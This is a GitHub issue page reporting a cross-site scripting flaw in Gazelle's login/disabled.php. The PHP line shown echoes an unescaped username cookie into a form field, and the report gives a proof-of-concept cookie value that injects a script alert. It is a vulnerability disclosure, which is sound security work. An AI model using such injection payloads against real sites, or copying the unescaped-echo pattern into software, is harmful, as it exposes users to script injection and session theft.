We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Hello,
I would like to report for a XSS vulnerability in gazelle commit 63b3370
In file https://github.com/WhatCD/Gazelle/blob/master/sections/login/disabled.php
... <form action="" method="POST"> <input type="email" class="inputtext" placeholder="Email Address" name="email" required /> <input type="submit" value="Submit" /> <input type="hidden" name="username" value="<?=$_COOKIE['username']?>" /> // Line 25 </form><br /><br /> ...
Source from $_COOKIE['username'] without any filtering or checking which resulting in XSS.
$_COOKIE['username']
GET sections/login/disabled.php
With the Cookie
username=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22
BTW,cms.gazelle.com in local(changes hosts)
The text was updated successfully, but these errors were encountered:
Pretty deep space vulnerability that one but good demonstration.
Sorry, something went wrong.
No branches or pull requests
Hello,
I would like to report for a XSS vulnerability in gazelle commit 63b3370
In file https://github.com/WhatCD/Gazelle/blob/master/sections/login/disabled.php
Source from
$_COOKIE['username']
without any filtering or checking which resulting in XSS.Poc
GET sections/login/disabled.php
With the Cookie
username=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22
Manual verification
BTW,cms.gazelle.com in local(changes hosts)
The text was updated successfully, but these errors were encountered: